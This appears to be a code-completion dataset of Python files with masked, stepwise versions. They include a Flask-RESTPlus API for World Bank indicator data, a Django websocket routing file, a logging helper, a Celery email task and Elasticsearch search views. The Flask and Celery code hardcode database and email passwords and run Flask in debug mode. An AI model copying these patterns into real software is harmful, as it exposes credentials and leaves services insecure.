datetime.datetime.utcnow(), 'entries': [\n format_collection_entry(entry) for entry in indicator_data]}\n created_collection = db[COLLECTION].insert_one(collection)\n return {'location':\n f'/{COLLECTION}/{str(created_collection.inserted_id)}',\n 'collection_id': str(created_collection.inserted_id),\n 'creation_time': str(collection['creation_time']), 'indicator':\n collection['indicator']}, 201\n\n @api.doc(description='[Q3] Retrieve the list of available collections.')\n @api.response(200, 'Successfully retreieved collections.')\n @api.response(400, 'Unable to retreive collections.')\n def get(self):\n try:\n collections = db[COLLECTION].find()\n except:\n return {'message': 'Unable to retrieve collections.'}, 400\n return [{'location': f\"/{COLLECTION}/{str(doc['_id'])}\",\n 'collection_id': str(doc['_id']), 'creation_time': str(doc[\n 'creation_time']), 'indicator': doc['indicator']} for doc in\n collections], 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\nclass CollectionsById(Resource):\n\n @api.doc(description='[Q2] Deleting a collection with the data service.')\n @api.response(200, 'Successfully removed collection.')\n @api.response(404, 'Unable to find collection.')\n @api.response(400, 'Unable to remove collection.')\n def delete(self, collection_id):\n if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):\n return {'message': 'Unable to find collection.'}, 404\n try:\n db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})\n except:\n return {'message': 'Unable to remove collection.'}, 400\n return {'message':\n f'Collection = {collection_id} has been removed from the database!'\n }, 200\n\n @api.doc(description='[Q4] Retrieve a collection.')\n @api.response(200, 'Successfully retreived collection.')\n @api.response(404, 'Unable to retreive collection.')\n def get(self, collection_id):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], 'indicator_value': collection[\n 'indicator_value'], 'creation_time': str(collection[\n 'creation_time']), 'entries': collection['entries']}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=\n f'{COLLECTION}_countrydate')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\[email protected]('country', 'Country identifier (eg. Arab World)')\nclass CollectionByCountryYear(Resource):\n\n @api.doc(description=\n '[Q5] Retrieve economic indicator value for given a country and year.')\n @api.response(200,\n 'Successfully retrieved economic indicator for given a country and year.'\n )\n @api.response(400, 'Unable to retrieve indicator entry.')\n @api.response(404, 'Unable to find collection.')\n def get(self, collection_id, year, country):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['country'] == country and entry['date'] == year]\n if len(filtered_entries) == 0:\n return {'message':\n f\"Unable to find specific indicator entry for country='{country}' and year='{year}'.\"\n }, 400\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], **filtered_entries[0]}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>', endpoint=\n f'{COLLECTION}_by_top_bottom')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\nclass CollectionByTopBottom(Resource):\n\n @api.doc(description=\n '[Q6] Retrieve top/bottom economic indicator values for a given year.')\n @api.response(200, 'Successfully retreived economic indicator values.')\n @api.response(404, 'Unable to find collection.')\n @api.expect(parser)\n def get(self, collection_id, year):\n query = request.args.get('q')\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['date'] == year]\n if not query:\n return {'indicator': collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': filtered_entries\n }, 200\n return {'indicator': collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': sorted(\n filtered_entries, key=lambda k: k['value'], reverse=True)[\n query_to_index(query, len(filtered_entries))]}, 200\n\n\nif __name__ == '__main__':\n db = mlab_client(dbuser=DB_CONFIG['dbuser'], dbpassword=DB_CONFIG[\n 'dbpassword'], mlab_inst=DB_CONFIG['mlab_inst'], dbname=DB_CONFIG[\n 'dbname'])\n app.run(debug=DEBUG)\n",
"step-5": "#!/usr/bin/env python3\nfrom flask import Flask, request\nfrom flask_restplus import Resource, Api, fields\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\nimport requests, datetime, re\n\n#------------- CONFIG CONSTANTS -------------#\n\nDEBUG = True\nMAX_PAGE_LIMIT = 2\nCOLLECTION = 'indicators'\nDB_CONFIG = {\n 'dbuser': 'z5113243',\n 'dbpassword': 'badpassword01',\n 'mlab_inst': 'ds239071',\n 'dbname': 'cs9321_ass2' \n}\n\n#------------- API INITIALISATION -------------#\n\ndb = None # initialised in main\napp = Flask(__name__)\napp.config.SWAGGER_UI_DOC_EXPANSION = 'list'\napi = Api(\n app,\n title='Assignment 2 - COMP9321 - Chris Joy (z5113243)',\n description='In this assignment, we\\'re asked to develop ' \\\n 'a Flask-Restplus data service that allows a client to ' \\\n 'read and store some publicly available economic indicator ' \\\n 'data for countries around the world, and allow the consumers ' \\\n 'to access the data through a REST API.'\n)\nindicator_model = api.model(COLLECTION, {\n 'indicator_id': fields.String(required=True,\n title='An Indicator ',\n description='http://api.worldbank.org/v2/indicators',\n example='NY.GDP.MKTP.CD'),\n})\nparser = api.parser()\nparser.add_argument('q', help='Query param. Expected format: top<k> / bottom<k>, ' \\\n 'where k is between 1 and 100. Eg. top10, bottom40')\n\n#------------- HELPER FUNCTIONS -------------#\n\ndef mlab_client(dbuser, dbpassword, mlab_inst, dbname):\n return MongoClient(\n f'mongodb://{dbuser}:{dbpassword}@{mlab_inst}.mlab.com:39071/{dbname}'\n )[dbname]\n\ndef api_url(indicator, date='2012:2017', fmt='json', page=1):\n return 'http://api.worldbank.org/v2/countries/all/indicators/' \\\n f'{indicator}?date={date}&format={fmt}&page={page}'\n\n# Recursively build an array containing indicator data\ndef get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT):\n response = requests.get(api_url(indicator=indicator, page=page)).json()\n if not indicator or (len(response) <= 1 and response[0]['message'][0]['key'] == 'Invalid value'):\n return 'Invalid indicator'\n if response[0]['page'] >= max_pages or response[0]['page'] == response[0]['pages']:\n return prevRes+response[1]\n return get_indicator_data(\n indicator=indicator,\n page=response[0]['page']+1,\n prevRes=prevRes+response[1],\n max_pages=max_pages,\n )\n\n# Restructure indicator entry according to spec\ndef format_collection_entry(indicator_data):\n return {\n 'country': indicator_data['country']['value'],\n 'date': indicator_data['date'],\n 'value': indicator_data['value'],\n }\n\n# Transform to top<k>/bottom<k> queries to array indexes\ndef query_to_index(query, arr_size):\n try:\n match = re.search(r'^(bottom|top)\\d+$', query).group()\n order = re.search(r'^(bottom|top)', match).group()\n length = int(re.search(r'\\d+$', match).group())\n if order == 'top':\n return slice(length)\n elif order == 'bottom':\n return slice(arr_size-length, arr_size)\n else:\n return slice(arr_size)\n except:\n return slice(arr_size)\n\n#------------- QUESTION ROUTES -------------#\n\[email protected](f'/{COLLECTION}', endpoint=COLLECTION)\nclass CollectionIndex(Resource):\n @api.doc(description='[Q1] Import a collection from the data service.')\n @api.response(200, 'Successfully retrieved collection.')\n @api.response(201, 'Successfully created collection.')\n @api.response(400, 'Unable to create / retrieve collection.')\n @api.expect(indicator_model)\n def post(self):\n body = request.json\n # Indicator hasn't been specified in body (400)\n if not body['indicator_id']:\n return { 'message': 'Please specify an indicator.' }, 400\n # Retrieve indicator from database (200)\n existing_collection = db[COLLECTION].find_one({'indicator': body['indicator_id']})\n if existing_collection:\n return {\n 'location': f'/{COLLECTION}/{str(existing_collection[\"_id\"])}',\n 'collection_id': str(existing_collection['_id']),\n 'creation_time': str(existing_collection['creation_time']),\n 'indicator': existing_collection['indicator'],\n }, 200\n # From now onwards we need to obtain data from the Worldbank API\n indicator_data = get_indicator_data(body['indicator_id'])\n # Valid indicator hasn't been specified (400)\n if indicator_data == 'Invalid indicator':\n return { 'message': 'Please specify a valid indicator.' }, 400\n # Create and retrieve indicator from Worldbank API (201)\n collection = {\n 'indicator': indicator_data[0]['indicator']['id'],\n 'indicator_value': indicator_data[0]['indicator']['value'],\n 'creation_time': datetime.datetime.utcnow(),\n 'entries': [format_collection_entry(entry) for entry in indicator_data],\n }\n created_collection = db[COLLECTION].insert_one(collection)\n return {\n 'location': f'/{COLLECTION}/{str(created_collection.inserted_id)}',\n 'collection_id': str(created_collection.inserted_id),\n 'creation_time': str(collection['creation_time']),\n 'indicator': collection['indicator'],\n }, 201\n\n @api.doc(description='[Q3] Retrieve the list of available collections.')\n @api.response(200, 'Successfully retreieved collections.')\n @api.response(400, 'Unable to retreive collections.')\n def get(self):\n try:\n collections = db[COLLECTION].find()\n except:\n return { 'message': 'Unable to retrieve collections.' }, 400\n return [{\n 'location': f'/{COLLECTION}/{str(doc[\"_id\"])}',\n 'collection_id': str(doc['_id']),\n 'creation_time': str(doc['creation_time']),\n 'indicator': doc['indicator'],\n } for doc in collections], 200\n\[email protected](f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\nclass CollectionsById(Resource):\n @api.doc(description='[Q2] Deleting a collection with the data service.')\n @api.response(200, 'Successfully removed collection.')\n @api.response(404, 'Unable to find collection.')\n @api.response(400, 'Unable to remove collection.')\n def delete(self, collection_id):\n # Check if collection exists\n if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):\n return { 'message': 'Unable to find collection.' }, 404\n # Remove collection from db\n try:\n db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})\n except:\n return { 'message': 'Unable to remove collection.' }, 400\n return { 'message': f'Collection = {collection_id} has been removed from the database!' }, 200\n\n @api.doc(description='[Q4] Retrieve a collection.')\n @api.response(200, 'Successfully retreived collection.')\n @api.response(404, 'Unable to retreive collection.')\n def get(self, collection_id):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(collection_id)})\n except:\n return { 'message': 'Unable to find collection' }, 404\n return {\n 'collection_id': str(collection['_id']),\n 'indicator': collection['indicator'],\n 'indicator_value': collection['indicator_value'],\n 'creation_time': str(collection['creation_time']),\n 'entries': collection['entries'],\n }, 200\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=f'{COLLECTION}_countrydate')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\[email protected]('country', 'Country identifier (eg. Arab World)')\nclass CollectionByCountryYear(Resource):\n @api.doc(description='[Q5] Retrieve economic indicator value for given a country and year.')\n @api.response(200, 'Successfully retrieved economic indicator for given a country and year.')\n @api.response(400, 'Unable to retrieve indicator entry.')\n @api.response(404, 'Unable to find collection.')\n def get(self, collection_id, year, country):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(collection_id)})\n except:\n return { 'message': 'Unable to find collection' }, 404\n # Create a filtered list containing entries that match params\n filtered_entries = [\n entry for entry in collection['entries'] if entry['country'] == country and entry['date'] == year\n ]\n if len(filtered_entries) == 0:\n return {'message': 'Unable to find specific indicator entry ' \\\n f'for country=\\'{country}\\' and year=\\'{year}\\'.'}, 400\n return {\n 'collection_id': str(collection['_id']),\n 'indicator': collection['indicator'],\n **filtered_entries[0],\n }, 200\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>', endpoint=f'{COLLECTION}_by_top_bottom')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\nclass CollectionByTopBottom(Resource):\n @api.doc(description='[Q6] Retrieve top/bottom economic indicator values for a given year.')\n @api.response(200, 'Successfully retreived economic indicator values.')\n @api.response(404, 'Unable to find collection.')\n @api.expect(parser)\n def get(self, collection_id, year):\n query = request.args.get('q')\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(collection_id)})\n except:\n return { 'message': 'Unable to find collection' }, 404\n filtered_entries = [\n entry for entry in collection['entries'] if entry['date'] == year\n ]\n if not query:\n return {\n 'indicator': collection['indicator'],\n 'indicator_value': collection['indicator_value'],\n 'entries': filtered_entries,\n }, 200\n return {\n 'indicator': collection['indicator'],\n 'indicator_value': collection['indicator_value'],\n 'entries': sorted(\n filtered_entries,\n key=lambda k: k['value'],\n reverse=True\n )[query_to_index(query, len(filtered_entries))],\n }, 200\n\nif __name__ == '__main__':\n db = mlab_client(\n dbuser=DB_CONFIG['dbuser'],\n dbpassword=DB_CONFIG['dbpassword'],\n mlab_inst=DB_CONFIG['mlab_inst'],\n dbname=DB_CONFIG['dbname']\n )\n app.run(debug=DEBUG)",
"step-ids": [
7,
11,
15,
16,
19
]
}
|
[
7,
11,
15,
16,
19
] |
from django.conf.urls import url
from . import consumers
websocket_urlpatterns = [
url(r'^account/home', consumers.NotificationConsumer),
url(r'^fund/(?P<fund>[\w-]+)', consumers.NotificationConsumer),
url(r'^websockets', consumers.StreamConsumer),
]
|
normal
|
{
"blob_id": "7ab9c530035185ee2250f3f6ce8cde87bdfd9803",
"index": 5295,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwebsocket_urlpatterns = [url('^account/home', consumers.\n NotificationConsumer), url('^fund/(?P<fund>[\\\\w-]+)', consumers.\n NotificationConsumer), url('^websockets', consumers.StreamConsumer)]\n",
"step-3": "from django.conf.urls import url\nfrom . import consumers\nwebsocket_urlpatterns = [url('^account/home', consumers.\n NotificationConsumer), url('^fund/(?P<fund>[\\\\w-]+)', consumers.\n NotificationConsumer), url('^websockets', consumers.StreamConsumer)]\n",
"step-4": "from django.conf.urls import url\n\nfrom . import consumers\n\nwebsocket_urlpatterns = [\n url(r'^account/home', consumers.NotificationConsumer),\n url(r'^fund/(?P<fund>[\\w-]+)', consumers.NotificationConsumer),\n url(r'^websockets', consumers.StreamConsumer),\n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def get_common_logger(name='common', logfile=None):
"""
args: name (str): logger name
logfile (str): log file, use stream handler (stdout) as default.
return:
logger obj
"""
my_logger = logging.getLogger(name)
my_logger.setLevel(config.LOG_LEVEL)
if logfile:
handler = logging.FileHandler(logfile)
else:
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'
)
handler.setFormatter(formatter)
my_logger.addHandler(handler)
my_logger.propagate = False
return my_logger
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_common_logger(name='common', logfile=None):
"""
args: name (str): logger name
logfile (str): log file, use stream handler (stdout) as default.
return:
logger obj
"""
my_logger = logging.getLogger(name)
my_logger.setLevel(config.LOG_LEVEL)
if logfile:
handler = logging.FileHandler(logfile)
else:
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'
)
handler.setFormatter(formatter)
my_logger.addHandler(handler)
my_logger.propagate = False
return my_logger
<|reserved_special_token_0|>
if __name__ == '__main__':
COMMON_LOGGER.debug('test')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_common_logger(name='common', logfile=None):
"""
args: name (str): logger name
logfile (str): log file, use stream handler (stdout) as default.
return:
logger obj
"""
my_logger = logging.getLogger(name)
my_logger.setLevel(config.LOG_LEVEL)
if logfile:
handler = logging.FileHandler(logfile)
else:
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'
)
handler.setFormatter(formatter)
my_logger.addHandler(handler)
my_logger.propagate = False
return my_logger
COMMON_LOGGER = get_common_logger('common logger')
if __name__ == '__main__':
COMMON_LOGGER.debug('test')
<|reserved_special_token_1|>
import logging
import config
def get_common_logger(name='common', logfile=None):
"""
args: name (str): logger name
logfile (str): log file, use stream handler (stdout) as default.
return:
logger obj
"""
my_logger = logging.getLogger(name)
my_logger.setLevel(config.LOG_LEVEL)
if logfile:
handler = logging.FileHandler(logfile)
else:
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'
)
handler.setFormatter(formatter)
my_logger.addHandler(handler)
my_logger.propagate = False
return my_logger
COMMON_LOGGER = get_common_logger('common logger')
if __name__ == '__main__':
COMMON_LOGGER.debug('test')
<|reserved_special_token_1|>
#!/usr/bin/env python
# coding: utf-8
import logging
import config
def get_common_logger(name='common', logfile=None):
'''
args: name (str): logger name
logfile (str): log file, use stream handler (stdout) as default.
return:
logger obj
'''
my_logger = logging.getLogger(name)
my_logger.setLevel(config.LOG_LEVEL)
if logfile:
handler = logging.FileHandler(logfile)
else:
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s')
handler.setFormatter(formatter)
my_logger.addHandler(handler)
# Stop logger propagate, forbiden duplicate log.
my_logger.propagate = False
return my_logger
COMMON_LOGGER = get_common_logger('common logger')
if __name__ == '__main__':
COMMON_LOGGER.debug('test')
|
flexible
|
{
"blob_id": "1754bce54a47cb78dce3b545d3dce835a4e0e69f",
"index": 947,
"step-1": "<mask token>\n\n\ndef get_common_logger(name='common', logfile=None):\n \"\"\"\n args: name (str): logger name\n logfile (str): log file, use stream handler (stdout) as default.\n return:\n logger obj\n \"\"\"\n my_logger = logging.getLogger(name)\n my_logger.setLevel(config.LOG_LEVEL)\n if logfile:\n handler = logging.FileHandler(logfile)\n else:\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'\n )\n handler.setFormatter(formatter)\n my_logger.addHandler(handler)\n my_logger.propagate = False\n return my_logger\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_common_logger(name='common', logfile=None):\n \"\"\"\n args: name (str): logger name\n logfile (str): log file, use stream handler (stdout) as default.\n return:\n logger obj\n \"\"\"\n my_logger = logging.getLogger(name)\n my_logger.setLevel(config.LOG_LEVEL)\n if logfile:\n handler = logging.FileHandler(logfile)\n else:\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'\n )\n handler.setFormatter(formatter)\n my_logger.addHandler(handler)\n my_logger.propagate = False\n return my_logger\n\n\n<mask token>\nif __name__ == '__main__':\n COMMON_LOGGER.debug('test')\n",
"step-3": "<mask token>\n\n\ndef get_common_logger(name='common', logfile=None):\n \"\"\"\n args: name (str): logger name\n logfile (str): log file, use stream handler (stdout) as default.\n return:\n logger obj\n \"\"\"\n my_logger = logging.getLogger(name)\n my_logger.setLevel(config.LOG_LEVEL)\n if logfile:\n handler = logging.FileHandler(logfile)\n else:\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'\n )\n handler.setFormatter(formatter)\n my_logger.addHandler(handler)\n my_logger.propagate = False\n return my_logger\n\n\nCOMMON_LOGGER = get_common_logger('common logger')\nif __name__ == '__main__':\n COMMON_LOGGER.debug('test')\n",
"step-4": "import logging\nimport config\n\n\ndef get_common_logger(name='common', logfile=None):\n \"\"\"\n args: name (str): logger name\n logfile (str): log file, use stream handler (stdout) as default.\n return:\n logger obj\n \"\"\"\n my_logger = logging.getLogger(name)\n my_logger.setLevel(config.LOG_LEVEL)\n if logfile:\n handler = logging.FileHandler(logfile)\n else:\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'\n )\n handler.setFormatter(formatter)\n my_logger.addHandler(handler)\n my_logger.propagate = False\n return my_logger\n\n\nCOMMON_LOGGER = get_common_logger('common logger')\nif __name__ == '__main__':\n COMMON_LOGGER.debug('test')\n",
"step-5": "#!/usr/bin/env python\n# coding: utf-8\n\nimport logging\n\nimport config\n\n\ndef get_common_logger(name='common', logfile=None):\n '''\n args: name (str): logger name\n logfile (str): log file, use stream handler (stdout) as default.\n return:\n logger obj\n '''\n my_logger = logging.getLogger(name)\n my_logger.setLevel(config.LOG_LEVEL)\n if logfile:\n handler = logging.FileHandler(logfile)\n else:\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s')\n handler.setFormatter(formatter)\n my_logger.addHandler(handler)\n # Stop logger propagate, forbiden duplicate log.\n my_logger.propagate = False\n return my_logger\n\n\nCOMMON_LOGGER = get_common_logger('common logger')\n\nif __name__ == '__main__':\n COMMON_LOGGER.debug('test')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from tilBackend.celery import app
import smtplib
import email
import ssl
#librerias pruebas
from celery.task.schedules import crontab
from celery.decorators import periodic_task
from celery.utils.log import get_task_logger
from celery import Celery
@app.task
def correo():
try:
port = 587
smtp_server = "smtp-mail.outlook.com"
user = '[email protected]'
password = "Python123"
message ="""Subject: Asuntooooo\n
Y este es el mensaje
"""
conn = smtplib.SMTP(smtp_server,587)
conn.ehlo()
conn.starttls()
conn.login(user,password)
#for x in range(0,10):
conn.sendmail(user,'[email protected]',message)
conn.quit
except:
print("Algo fallo")
def task_correo():
"""
envia correo
"""
correo()
logger.info("se envio el correo")
app.conf.update
|
normal
|
{
"blob_id": "d0a6bfb729a150863303621a136ae80e96ae32d0",
"index": 3250,
"step-1": "<mask token>\n\n\ndef task_correo():\n \"\"\"\n envia correo\n \"\"\"\n correo()\n logger.info('se envio el correo')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]\ndef correo():\n try:\n port = 587\n smtp_server = 'smtp-mail.outlook.com'\n user = '[email protected]'\n password = 'Python123'\n message = \"\"\"Subject: Asuntooooo\n\n Y este es el mensaje\n \"\"\"\n conn = smtplib.SMTP(smtp_server, 587)\n conn.ehlo()\n conn.starttls()\n conn.login(user, password)\n conn.sendmail(user, '[email protected]', message)\n conn.quit\n except:\n print('Algo fallo')\n\n\ndef task_correo():\n \"\"\"\n envia correo\n \"\"\"\n correo()\n logger.info('se envio el correo')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]\ndef correo():\n try:\n port = 587\n smtp_server = 'smtp-mail.outlook.com'\n user = '[email protected]'\n password = 'Python123'\n message = \"\"\"Subject: Asuntooooo\n\n Y este es el mensaje\n \"\"\"\n conn = smtplib.SMTP(smtp_server, 587)\n conn.ehlo()\n conn.starttls()\n conn.login(user, password)\n conn.sendmail(user, '[email protected]', message)\n conn.quit\n except:\n print('Algo fallo')\n\n\ndef task_correo():\n \"\"\"\n envia correo\n \"\"\"\n correo()\n logger.info('se envio el correo')\n\n\napp.conf.update\n",
"step-4": "from tilBackend.celery import app\nimport smtplib\nimport email\nimport ssl\nfrom celery.task.schedules import crontab\nfrom celery.decorators import periodic_task\nfrom celery.utils.log import get_task_logger\nfrom celery import Celery\n\n\[email protected]\ndef correo():\n try:\n port = 587\n smtp_server = 'smtp-mail.outlook.com'\n user = '[email protected]'\n password = 'Python123'\n message = \"\"\"Subject: Asuntooooo\n\n Y este es el mensaje\n \"\"\"\n conn = smtplib.SMTP(smtp_server, 587)\n conn.ehlo()\n conn.starttls()\n conn.login(user, password)\n conn.sendmail(user, '[email protected]', message)\n conn.quit\n except:\n print('Algo fallo')\n\n\ndef task_correo():\n \"\"\"\n envia correo\n \"\"\"\n correo()\n logger.info('se envio el correo')\n\n\napp.conf.update\n",
"step-5": "from tilBackend.celery import app\nimport smtplib\nimport email\nimport ssl\n#librerias pruebas\nfrom celery.task.schedules import crontab\nfrom celery.decorators import periodic_task\nfrom celery.utils.log import get_task_logger\nfrom celery import Celery\n\[email protected]\ndef correo():\n try:\n port = 587\n smtp_server = \"smtp-mail.outlook.com\"\n user = '[email protected]'\n password = \"Python123\"\n message =\"\"\"Subject: Asuntooooo\\n\n Y este es el mensaje\n \"\"\"\n conn = smtplib.SMTP(smtp_server,587)\n conn.ehlo()\n conn.starttls()\n conn.login(user,password)\n #for x in range(0,10):\n conn.sendmail(user,'[email protected]',message)\n conn.quit\n except:\n print(\"Algo fallo\")\n\n\n\n\ndef task_correo():\n \"\"\"\n envia correo\n \"\"\"\n correo()\n logger.info(\"se envio el correo\")\n\n\n\napp.conf.update\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(f'Текст:{x}')
print(f'Число:{y}')
<|reserved_special_token_0|>
print(f'Вы ввели числа: {a1}/{a2}')
print(f'Вы ввели строки: {b1} / {b2}')
<|reserved_special_token_1|>
y = 10
x = 'Тишь да гладь'
print(f'Текст:{x}')
print(f'Число:{y}')
a1 = input('Введите первое число: ')
a2 = input('Введите второе число: ')
b1 = input('Введите первую строку: ')
b2 = input('Введите вторую строку: ')
print(f'Вы ввели числа: {a1}/{a2}')
print(f'Вы ввели строки: {b1} / {b2}')
|
flexible
|
{
"blob_id": "2fabb03f0f6b0b297245354782e650380509424b",
"index": 8054,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(f'Текст:{x}')\nprint(f'Число:{y}')\n<mask token>\nprint(f'Вы ввели числа: {a1}/{a2}')\nprint(f'Вы ввели строки: {b1} / {b2}')\n",
"step-3": "y = 10\nx = 'Тишь да гладь'\nprint(f'Текст:{x}')\nprint(f'Число:{y}')\na1 = input('Введите первое число: ')\na2 = input('Введите второе число: ')\nb1 = input('Введите первую строку: ')\nb2 = input('Введите вторую строку: ')\nprint(f'Вы ввели числа: {a1}/{a2}')\nprint(f'Вы ввели строки: {b1} / {b2}')\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class SearchSuggest(View):
<|reserved_special_token_0|>
class SearchDetail(View):
def get(self, request):
key_words = request.GET.get('q', '')
data = {}
if key_words:
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match',
company_name=key_words)
for i in s[0]:
data['company_name'] = i.company_name
data['crn'] = i.crn
try:
data['former_name'] = str(i.former_name)
except:
pass
data['organization_type'] = i.organization_type
data['faren'] = i.faren
data['registered_capital'] = i.registered_capital
data['company_type'] = i.company_type
data['registration_state'] = i.registration_state
data['searched_by'] = str(i.searched_by)
data['data_count'] = i.data_count
return HttpResponse(json.dumps(data), content_type='application/json')
class CodeSearch(View):
def get(self, request):
key_words = request.GET.get('code', '')
print(key_words)
search = Search_1()
data = search.get_data(key_words)
print(data)
return JsonResponse(data)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SearchSuggest(View):
def get(self, request):
key_words = request.GET.get('s', '')
re_datas = []
com_datas = []
if key_words:
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match',
company_name=key_words)
for i in s:
re_datas.append(i.company_name)
res = s.execute()
return HttpResponse(json.dumps(re_datas), content_type=
'application/json')
class SearchDetail(View):
def get(self, request):
key_words = request.GET.get('q', '')
data = {}
if key_words:
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match',
company_name=key_words)
for i in s[0]:
data['company_name'] = i.company_name
data['crn'] = i.crn
try:
data['former_name'] = str(i.former_name)
except:
pass
data['organization_type'] = i.organization_type
data['faren'] = i.faren
data['registered_capital'] = i.registered_capital
data['company_type'] = i.company_type
data['registration_state'] = i.registration_state
data['searched_by'] = str(i.searched_by)
data['data_count'] = i.data_count
return HttpResponse(json.dumps(data), content_type='application/json')
class CodeSearch(View):
def get(self, request):
key_words = request.GET.get('code', '')
print(key_words)
search = Search_1()
data = search.get_data(key_words)
print(data)
return JsonResponse(data)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SearchSuggest(View):
def get(self, request):
key_words = request.GET.get('s', '')
re_datas = []
com_datas = []
if key_words:
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match',
company_name=key_words)
for i in s:
re_datas.append(i.company_name)
res = s.execute()
return HttpResponse(json.dumps(re_datas), content_type=
'application/json')
class SearchDetail(View):
def get(self, request):
key_words = request.GET.get('q', '')
data = {}
if key_words:
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match',
company_name=key_words)
for i in s[0]:
data['company_name'] = i.company_name
data['crn'] = i.crn
try:
data['former_name'] = str(i.former_name)
except:
pass
data['organization_type'] = i.organization_type
data['faren'] = i.faren
data['registered_capital'] = i.registered_capital
data['company_type'] = i.company_type
data['registration_state'] = i.registration_state
data['searched_by'] = str(i.searched_by)
data['data_count'] = i.data_count
return HttpResponse(json.dumps(data), content_type='application/json')
class CodeSearch(View):
def get(self, request):
key_words = request.GET.get('code', '')
print(key_words)
search = Search_1()
data = search.get_data(key_words)
print(data)
return JsonResponse(data)
if __name__ == '__main__':
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match', company_name=
'延安一正启源科技发展股份有限公司')
res = s.execute()
a = res['hits']['hits'][0]['_source']
print(a['former_name'])
<|reserved_special_token_1|>
